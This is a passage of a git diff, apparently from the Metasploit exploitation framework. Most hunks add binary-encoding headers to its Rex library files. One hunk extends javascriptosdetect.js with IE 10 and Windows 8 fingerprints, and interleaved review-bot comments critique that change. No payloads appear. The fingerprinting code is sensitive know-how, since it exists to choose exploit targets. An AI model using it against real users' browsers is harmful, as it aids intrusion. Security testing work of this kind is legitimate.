index 819db54c09..b4380ba1da 100644
--- a/lib/rex/encoding/xor/dword.rb.ut.rb
+++ b/lib/rex/encoding/xor/dword.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/dword_additive.rb b/lib/rex/encoding/xor/dword_additive.rb
index ec9ee0f7a1..0107cb115d 100644
--- a/lib/rex/encoding/xor/dword_additive.rb
+++ b/lib/rex/encoding/xor/dword_additive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/exceptions'
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/dword_additive.rb.ut.rb b/lib/rex/encoding/xor/dword_additive.rb.ut.rb
index ef398a92c2..c26d7600fb 100644
--- a/lib/rex/encoding/xor/dword_additive.rb.ut.rb
+++ b/lib/rex/encoding/xor/dword_additive.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/exceptions.rb b/lib/rex/encoding/xor/exceptions.rb
index 883a7aa9e7..fa1e4b659b 100644
--- a/lib/rex/encoding/xor/exceptions.rb
+++ b/lib/rex/encoding/xor/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Encoding
diff --git a/lib/rex/encoding/xor/generic.rb b/lib/rex/encoding/xor/generic.rb
index 89a35238b3..6a1c538a0d 100644
--- a/lib/rex/encoding/xor/generic.rb
+++ b/lib/rex/encoding/xor/generic.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/exceptions'
require 'rex/text'
diff --git a/lib/rex/encoding/xor/generic.rb.ut.rb b/lib/rex/encoding/xor/generic.rb.ut.rb
index 3ac2f7d92c..2088a1a46a 100644
--- a/lib/rex/encoding/xor/generic.rb.ut.rb
+++ b/lib/rex/encoding/xor/generic.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/qword.rb b/lib/rex/encoding/xor/qword.rb
index 323232a71b..f4fc38eca0 100644
--- a/lib/rex/encoding/xor/qword.rb
+++ b/lib/rex/encoding/xor/qword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/word.rb b/lib/rex/encoding/xor/word.rb
index a3b9d5c6e3..2ceff262eb 100644
--- a/lib/rex/encoding/xor/word.rb
+++ b/lib/rex/encoding/xor/word.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/word.rb.ut.rb b/lib/rex/encoding/xor/word.rb.ut.rb
index a7b1918c95..56e138c818 100644
--- a/lib/rex/encoding/xor/word.rb.ut.rb
+++ b/lib/rex/encoding/xor/word.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/exceptions.rb b/lib/rex/exceptions.rb
index a4ca4ef80d..f253207eb1 100644
--- a/lib/rex/exceptions.rb
+++ b/lib/rex/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
diff --git a/lib/rex/exceptions.rb.ut.rb b/lib/rex/exceptions.rb.ut.rb
index 61963da29d..9ecb02b848 100644
--- a/lib/rex/exceptions.rb.ut.rb
+++ b/lib/rex/exceptions.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/exploitation/cmdstager.rb b/lib/rex/exploitation/cmdstager.rb
index 75a68b2fe3..298976ec9e 100644
--- a/lib/rex/exploitation/cmdstager.rb
+++ b/lib/rex/exploitation/cmdstager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/exploitation/cmdstager/base.rb b/lib/rex/exploitation/cmdstager/base.rb
index fa6eab8fd7..d5eaf90ff7 100644
--- a/lib/rex/exploitation/cmdstager/base.rb
+++ b/lib/rex/exploitation/cmdstager/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
diff --git a/lib/rex/exploitation/cmdstager/debug_asm.rb b/lib/rex/exploitation/cmdstager/debug_asm.rb
index 05a68f8a16..92d1aae809 100644
--- a/lib/rex/exploitation/cmdstager/debug_asm.rb
+++ b/lib/rex/exploitation/cmdstager/debug_asm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: debug_asm.rb 12595 2011-05-12 18:33:49Z jduck $
##
diff --git a/lib/rex/exploitation/cmdstager/debug_write.rb b/lib/rex/exploitation/cmdstager/debug_write.rb
index cf5438036c..1d0fdbc8d7 100644
--- a/lib/rex/exploitation/cmdstager/debug_write.rb
+++ b/lib/rex/exploitation/cmdstager/debug_write.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: debug_write.rb 12595 2011-05-12 18:33:49Z jduck $
##
diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb
index d389d95e61..130ad91999 100644
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/exploitation/cmdstager/vbs.rb b/lib/rex/exploitation/cmdstager/vbs.rb
index 920c7e7847..a699ad3820 100644
--- a/lib/rex/exploitation/cmdstager/vbs.rb
+++ b/lib/rex/exploitation/cmdstager/vbs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: vbs.rb 12595 2011-05-12 18:33:49Z jduck $
##
diff --git a/lib/rex/exploitation/egghunter.rb b/lib/rex/exploitation/egghunter.rb
index 8d2d676869..f65545a67b 100644
--- a/lib/rex/exploitation/egghunter.rb
+++ b/lib/rex/exploitation/egghunter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'metasm'
diff --git a/lib/rex/exploitation/egghunter.rb.ut.rb b/lib/rex/exploitation/egghunter.rb.ut.rb
index bf1808c0e4..1aac3151c0 100644
--- a/lib/rex/exploitation/egghunter.rb.ut.rb
+++ b/lib/rex/exploitation/egghunter.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/exploitation/encryptjs.rb b/lib/rex/exploitation/encryptjs.rb
index a270f5ffd9..783682e799 100644
--- a/lib/rex/exploitation/encryptjs.rb
+++ b/lib/rex/exploitation/encryptjs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Exploitation
diff --git a/lib/rex/exploitation/heaplib.rb b/lib/rex/exploitation/heaplib.rb
index e070034cfa..a82cbfddc6 100644
--- a/lib/rex/exploitation/heaplib.rb
+++ b/lib/rex/exploitation/heaplib.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/jsobfu'
diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js
index 7a6e8e0d46..cb1148247a 100644
--- a/lib/rex/exploitation/javascriptosdetect.js
+++ b/lib/rex/exploitation/javascriptosdetect.js
@@ -123,7 +123,8 @@ window.os_detect.getVersion = function(){
break;
}
}
- } else if (typeof window.onmousewheel != 'undefined') {
+ } else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel
+
// Then this is webkit, could be Safari or Chrome.
// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
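Review bot: The guard added to the `else if` is written as a negated equality, `! (typeof ScriptEngineMajorVersion == 'function')`, and is followed by a stray added blank line; `typeof ScriptEngineMajorVersion != 'function'` reads more directly and the empty `+` line can be dropped. The explanation `// IE 10 now has onmousewheel` is appended to an already long condition line, so it would be easier to find on its own line above the branch. The branch still treats every remaining browser that exposes `onmousewheel` as WebKit, so the existing `// Then this is webkit` comment states an assumption that the test itself does not establish. The enclosing `getVersion` function starts and ends outside the hunk.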
@@ -243,6 +244,7 @@ window.os_detect.getVersion = function(){
case "Windows NT 5.2": os_flavor = "2003"; break;
case "Windows NT 6.0": os_flavor = "Vista"; break;
case "Windows NT 6.1": os_flavor = "7"; break;
+ case "Windows NT 6.2": os_flavor = "8"; break;
}
}
if (version.match(/Linux/)) {
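Review bot: The `Windows NT 6.2` to `"8"` mapping is added here as a `case` and again in the `@@ -847,6 +861,7 @@` hunk as an `indexOf("windows nt 6.2")` branch, so the same table now lives in two places that have to be edited together. A single lookup keyed on the lower-cased NT version and used by both sites would remove the duplication; failing that, each site should carry a comment such as `// keep in sync with the indexOf() chain further down`. Windows Server 2012 also reports NT 6.2, so `"8"` is only a best guess on server hosts and the line should say so. Both the switch and the `else if` chain start outside their hunks.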
@@ -782,7 +784,19 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
-
+ case "9016446":
+ // IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
+ // Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
+ os_flavor = "7";
+ ua_version = "9.0";
+ os_sp = "SP1";
+ break;
+ case "1000":
+ // IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
+ ua_version = "10.0";
+ os_flavor = "8";
+ os_sp = "SP0";
+ break;
default:
unknown_fingerprint = version;
break;
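Review bot: The comment on the new `case "9016446"` contains the sample User-Agent string twice back to back and an unbalanced parenthesis in `(Update Versions: 9.0.7 (KB2699988)`; one copy of the string is enough. Neither new case says what the key encodes (presumably the concatenated script-engine version numbers), and a one-line comment stating that would let a reader check a value like `"1000"`. By its own comment that key comes from a pre-release IE 10 build, so it probably will not match release builds and should be marked provisional, e.g. `// pre-release build only; re-check against the final release`. The two cases also assign `os_flavor`, `ua_version` and `os_sp` in different orders, and the hunk removes the blank line that separated the preceding case. The switch starts outside the hunk.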
@@ -847,6 +861,7 @@ window.os_detect.getVersion = function(){
else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003"; }
else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; }
else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7"; }
+ else if (version.indexOf("windows nt 6.2") != -1) { os_flavor = "8"; }
}
if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) {
if (version.indexOf("gentoo") != -1) { os_flavor = "Gentoo"; }
diff --git a/lib/rex/exploitation/javascriptosdetect.rb b/lib/rex/exploitation/javascriptosdetect.rb
index 686e681e0a..c481ffda18 100644
--- a/lib/rex/exploitation/javascriptosdetect.rb
+++ b/lib/rex/exploitation/javascriptosdetect.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
diff --git a/lib/rex/exploitation/jsobfu.rb b/lib/rex/exploitation/jsobfu.rb
index ead60d4b1d..844d9f8e64 100644
--- a/lib/rex/exploitation/jsobfu.rb
+++ b/lib/rex/exploitation/jsobfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/exploitation/obfuscatejs.rb b/lib/rex/exploitation/obfuscatejs.rb
index e00fd677e2..94e17c06dc 100644
--- a/lib/rex/exploitation/obfuscatejs.rb
+++ b/lib/rex/exploitation/obfuscatejs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
module Rex
module Exploitation
diff --git a/lib/rex/exploitation/omelet.rb b/lib/rex/exploitation/omelet.rb
index 6147949f73..7321c836d8 100644
--- a/lib/rex/exploitation/omelet.rb
+++ b/lib/rex/exploitation/omelet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'metasm'
diff --git a/lib/rex/exploitation/omelet.rb.ut.rb b/lib/rex/exploitation/omelet.rb.ut.rb
index 09d6b14c69..f82fff22bd 100644
--- a/lib/rex/exploitation/omelet.rb.ut.rb
+++ b/lib/rex/exploitation/omelet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/exploitation/opcodedb.rb b/lib/rex/exploitation/opcodedb.rb
index 4b948994f1..2dcca7c5ae 100644
--- a/lib/rex/exploitation/opcodedb.rb
+++ b/lib/rex/exploitation/opcodedb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/rexml'
require 'rexml/source'
require 'rexml/document'
diff --git a/lib/rex/exploitation/opcodedb.rb.ut.rb b/lib/rex/exploitation/opcodedb.rb.ut.rb
index 29610fdae0..828fd3bb49 100644
--- a/lib/rex/exploitation/opcodedb.rb.ut.rb
+++ b/lib/rex/exploitation/opcodedb.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/exploitation/seh.rb b/lib/rex/exploitation/seh.rb
index 11c93e32bc..574c0923c2 100644
--- a/lib/rex/exploitation/seh.rb
+++ b/lib/rex/exploitation/seh.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch/x86'
diff --git a/lib/rex/exploitation/seh.rb.ut.rb b/lib/rex/exploitation/seh.rb.ut.rb
index 54e6be0af2..d896fd22f3 100644
--- a/lib/rex/exploitation/seh.rb.ut.rb
+++ b/lib/rex/exploitation/seh.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/file.rb b/lib/rex/file.rb
index 6903be34de..99e82c40c0 100644
--- a/lib/rex/file.rb
+++ b/lib/rex/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'find'
require 'rex/compat'
require 'tempfile'
diff --git a/lib/rex/file.rb.ut.rb b/lib/rex/file.rb.ut.rb
index e4e07fed4d..0a6ad15214 100644
--- a/lib/rex/file.rb.ut.rb
+++ b/lib/rex/file.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/image_source.rb b/lib/rex/image_source.rb
index a3fb39088b..1cf4a94a8d 100644
--- a/lib/rex/image_source.rb
+++ b/lib/rex/image_source.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb
index 6338c987fa..4a4a8b62c8 100644
--- a/lib/rex/image_source/disk.rb
+++ b/lib/rex/image_source/disk.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb
index e6ef98e014..9f2456cd43 100644
--- a/lib/rex/image_source/image_source.rb
+++ b/lib/rex/image_source/image_source.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/image_source/memory.rb b/lib/rex/image_source/memory.rb
index cc9bdae342..c75be1881f 100644
--- a/lib/rex/image_source/memory.rb
+++ b/lib/rex/image_source/memory.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/io/bidirectional_pipe.rb b/lib/rex/io/bidirectional_pipe.rb
index 1fd55d5210..d85a7d40ae 100644
--- a/lib/rex/io/bidirectional_pipe.rb
+++ b/lib/rex/io/bidirectional_pipe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module IO
diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb
index 19ea97132c..5fa926ff28 100644
--- a/lib/rex/io/datagram_abstraction.rb
+++ b/lib/rex/io/datagram_abstraction.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'socket'
diff --git a/lib/rex/io/ring_buffer.rb b/lib/rex/io/ring_buffer.rb
index d4d7feea05..85f7e7ca5b 100644
--- a/lib/rex/io/ring_buffer.rb
+++ b/lib/rex/io/ring_buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This class implements a ring buffer with "cursors" in the form of sequence numbers.
# To use this class, pass in a file descriptor and a ring size, the class will read
diff --git a/lib/rex/io/ring_buffer.rb.ut.rb b/lib/rex/io/ring_buffer.rb.ut.rb
index a49420fce3..e436a9cbc9 100644
--- a/lib/rex/io/ring_buffer.rb.ut.rb
+++ b/lib/rex/io/ring_buffer.rb.ut.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/io/stream.rb b/lib/rex/io/stream.rb
index ebe72d0e78..a7dffc368b 100644
--- a/lib/rex/io/stream.rb
+++ b/lib/rex/io/stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/sync/thread_safe'
module Rex
diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb
index e71100f9d9..6fed32d12f 100644
--- a/lib/rex/io/stream_abstraction.rb
+++ b/lib/rex/io/stream_abstraction.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'socket'
require 'fcntl'
diff --git a/lib/rex/io/stream_server.rb b/lib/rex/io/stream_server.rb
index e32082dea1..8ed10692bb 100644
--- a/lib/rex/io/stream_server.rb
+++ b/lib/rex/io/stream_server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/job_container.rb b/lib/rex/job_container.rb
index c6c067d231..cda3afd3ea 100644
--- a/lib/rex/job_container.rb
+++ b/lib/rex/job_container.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/logging.rb b/lib/rex/logging.rb
index 51bb2b97da..0a64633264 100644
--- a/lib/rex/logging.rb
+++ b/lib/rex/logging.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/constants' # for LEV_'s
require 'rex/logging/log_dispatcher'
diff --git a/lib/rex/logging/log_dispatcher.rb b/lib/rex/logging/log_dispatcher.rb
index 6a4b55eeb6..c31130fe17 100644
--- a/lib/rex/logging/log_dispatcher.rb
+++ b/lib/rex/logging/log_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/sync'
require 'rex/logging/log_sink'
diff --git a/lib/rex/logging/log_sink.rb b/lib/rex/logging/log_sink.rb
index 57afaa56f5..e141800b5b 100644
--- a/lib/rex/logging/log_sink.rb
+++ b/lib/rex/logging/log_sink.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/constants'
module Rex
diff --git a/lib/rex/logging/sinks/flatfile.rb b/lib/rex/logging/sinks/flatfile.rb
index d57919092d..3c9d1627fc 100644
--- a/lib/rex/logging/sinks/flatfile.rb
+++ b/lib/rex/logging/sinks/flatfile.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Logging
module Sinks
diff --git a/lib/rex/logging/sinks/stderr.rb b/lib/rex/logging/sinks/stderr.rb
index 253938ad42..3ed78801fc 100644
--- a/lib/rex/logging/sinks/stderr.rb
+++ b/lib/rex/logging/sinks/stderr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Logging
module Sinks
diff --git a/lib/rex/machparsey.rb b/lib/rex/machparsey.rb
index fc47aefc9a..ca4a21e06f 100644
--- a/lib/rex/machparsey.rb
+++ b/lib/rex/machparsey.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachParsey
diff --git a/lib/rex/machparsey/exceptions.rb b/lib/rex/machparsey/exceptions.rb
index 6e53959204..4a18c80fbe 100644
--- a/lib/rex/machparsey/exceptions.rb
+++ b/lib/rex/machparsey/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachParsey
diff --git a/lib/rex/machparsey/mach.rb b/lib/rex/machparsey/mach.rb
index 46eca14c65..bcb2abdefd 100644
--- a/lib/rex/machparsey/mach.rb
+++ b/lib/rex/machparsey/mach.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/machparsey/machbase'
require 'rex/machparsey/exceptions'
diff --git a/lib/rex/machparsey/machbase.rb b/lib/rex/machparsey/machbase.rb
index 85068c360c..46387daf23 100644
--- a/lib/rex/machparsey/machbase.rb
+++ b/lib/rex/machparsey/machbase.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/struct2'
diff --git a/lib/rex/machscan.rb b/lib/rex/machscan.rb
index a6ce1b0cd7..a46745d53f 100644
--- a/lib/rex/machscan.rb
+++ b/lib/rex/machscan.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachScan
diff --git a/lib/rex/machscan/scanner.rb b/lib/rex/machscan/scanner.rb
index 59bdbeebba..2442e581ee 100644
--- a/lib/rex/machscan/scanner.rb
+++ b/lib/rex/machscan/scanner.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachScan
diff --git a/lib/rex/mime.rb b/lib/rex/mime.rb
index 57498c2f54..840b4ab2bc 100644
--- a/lib/rex/mime.rb
+++ b/lib/rex/mime.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
diff --git a/lib/rex/mime/header.rb b/lib/rex/mime/header.rb
index 399a230066..469138d3c3 100644
--- a/lib/rex/mime/header.rb
+++ b/lib/rex/mime/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
class Header
diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb
index b5c39be0c2..a8a3d7d471 100644
--- a/lib/rex/mime/message.rb
+++ b/lib/rex/mime/message.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
class Message
diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb
index ed00fb82c0..143a1c8de0 100644
--- a/lib/rex/mime/part.rb
+++ b/lib/rex/mime/part.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
class Part
diff --git a/lib/rex/nop/opty2.rb b/lib/rex/nop/opty2.rb
index 187e558b60..6a56521dea 100644
--- a/lib/rex/nop/opty2.rb
+++ b/lib/rex/nop/opty2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/arch/x86'
require 'rex/nop/opty2_tables'
diff --git a/lib/rex/nop/opty2.rb.ut.rb b/lib/rex/nop/opty2.rb.ut.rb
index b670e59b55..5fe9da764b 100644
--- a/lib/rex/nop/opty2.rb.ut.rb
+++ b/lib/rex/nop/opty2.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/nop/opty2_tables.rb b/lib/rex/nop/opty2_tables.rb
index 632a04eda5..65f03ae52d 100644
--- a/lib/rex/nop/opty2_tables.rb
+++ b/lib/rex/nop/opty2_tables.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Nop
diff --git a/lib/rex/ole.rb b/lib/rex/ole.rb
index 20cdb7a5bc..d2a0407134 100644
--- a/lib/rex/ole.rb
+++ b/lib/rex/ole.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/clsid.rb b/lib/rex/ole/clsid.rb
index 4158205467..e697dd121d 100644
--- a/lib/rex/ole/clsid.rb
+++ b/lib/rex/ole/clsid.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/difat.rb b/lib/rex/ole/difat.rb
index ac48e0102e..52ab121b4c 100644
--- a/lib/rex/ole/difat.rb
+++ b/lib/rex/ole/difat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb
index 9ea03ffefc..6f43c71f44 100644
--- a/lib/rex/ole/directory.rb
+++ b/lib/rex/ole/directory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/direntry.rb b/lib/rex/ole/direntry.rb
index 6f2e3aa339..c6f634691a 100644
--- a/lib/rex/ole/direntry.rb
+++ b/lib/rex/ole/direntry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/fat.rb b/lib/rex/ole/fat.rb
index 827ce17465..2edb3de8ac 100644
--- a/lib/rex/ole/fat.rb
+++ b/lib/rex/ole/fat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb
index 478c086c69..b24eef4e31 100644
--- a/lib/rex/ole/header.rb
+++ b/lib/rex/ole/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/minifat.rb b/lib/rex/ole/minifat.rb
index a5251771ca..1e9bbdb0e3 100644
--- a/lib/rex/ole/minifat.rb
+++ b/lib/rex/ole/minifat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/propset.rb b/lib/rex/ole/propset.rb
index 2f2e50cbf2..8a1812d96c 100644
--- a/lib/rex/ole/propset.rb
+++ b/lib/rex/ole/propset.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/samples/create_ole.rb b/lib/rex/ole/samples/create_ole.rb
index f85784020b..52f968075b 100755
--- a/lib/rex/ole/samples/create_ole.rb
+++ b/lib/rex/ole/samples/create_ole.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/samples/dir.rb b/lib/rex/ole/samples/dir.rb
index 8cd7408a01..6bac03a4b1 100755
--- a/lib/rex/ole/samples/dir.rb
+++ b/lib/rex/ole/samples/dir.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/samples/dump_stream.rb b/lib/rex/ole/samples/dump_stream.rb
index 47b2b42a52..aea1b57940 100755
--- a/lib/rex/ole/samples/dump_stream.rb
+++ b/lib/rex/ole/samples/dump_stream.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/samples/ole_info.rb b/lib/rex/ole/samples/ole_info.rb
index f221f71390..5f0eb3dcff 100755
--- a/lib/rex/ole/samples/ole_info.rb
+++ b/lib/rex/ole/samples/ole_info.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb
index cb532f3d49..55f6259a60 100644
--- a/lib/rex/ole/storage.rb
+++ b/lib/rex/ole/storage.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/stream.rb b/lib/rex/ole/stream.rb
index 34d887d83f..fd7e36d050 100644
--- a/lib/rex/ole/stream.rb
+++ b/lib/rex/ole/stream.rb
@@ -1,3 +1,4 @@
